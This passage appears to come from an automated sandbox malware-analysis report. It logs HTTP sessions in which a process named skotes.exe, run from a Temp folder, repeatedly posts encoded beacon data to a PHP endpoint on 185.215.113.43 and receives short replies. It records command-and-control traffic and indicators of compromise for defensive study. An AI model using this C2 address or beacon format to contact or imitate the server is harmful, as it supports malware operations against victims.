                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:58:13.043070078 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                Dec 13, 2024 13:58:14.414484978 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:58:14 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                131192.168.2.450578185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:58:16.159480095 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                                                                Dec 13, 2024 13:58:17.507642031 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:58:17 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                132192.168.2.450579185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:58:19.140461922 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                Dec 13, 2024 13:58:20.557054043 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:58:20 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                133192.168.2.450580185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:58:22.295037031 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                                                                Dec 13, 2024 13:58:23.654666901 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:58:23 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                134192.168.2.450581185.215.113.4380
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:58:25.291284084 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                Dec 13, 2024 13:58:26.643733025 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:58:26 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                135192.168.2.450582185.215.113.4380
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:58:28.389202118 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                                                                Dec 13, 2024 13:58:29.742602110 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:58:29 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                136192.168.2.450583185.215.113.4380
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:58:31.376060963 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                Dec 13, 2024 13:58:32.751190901 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:58:32 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                137192.168.2.450584185.215.113.4380
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:58:34.486758947 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                                                                Dec 13, 2024 13:58:35.836251974 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:58:35 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                138192.168.2.450585185.215.113.4380
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:58:37.465717077 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                Dec 13, 2024 13:58:38.839274883 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:58:38 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                139192.168.2.450586185.215.113.4380
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:58:40.582559109 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                                                                Dec 13, 2024 13:58:41.981508970 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:58:41 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                140192.168.2.450587185.215.113.4380
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:58:43.619529963 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                Dec 13, 2024 13:58:44.980926991 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:58:44 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                141192.168.2.450588185.215.113.4380
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:58:46.715717077 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                                                                Dec 13, 2024 13:58:48.082899094 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:58:47 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                142192.168.2.450589185.215.113.4380
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:58:49.715516090 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                Dec 13, 2024 13:58:51.078264952 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:58:50 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                143192.168.2.450590185.215.113.4380
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:58:52.972539902 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                                                                Dec 13, 2024 13:58:54.330405951 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:58:54 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                144192.168.2.450591185.215.113.4380
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:58:55.969676018 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                Dec 13, 2024 13:58:57.352562904 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:58:57 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                145192.168.2.450592185.215.113.4380
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:58:59.087487936 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                                                                Dec 13, 2024 13:59:00.434947968 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:59:00 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                146192.168.2.450593185.215.113.4380
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:59:02.065928936 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                Dec 13, 2024 13:59:03.457000017 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:59:03 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                147192.168.2.450594185.215.113.4380
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
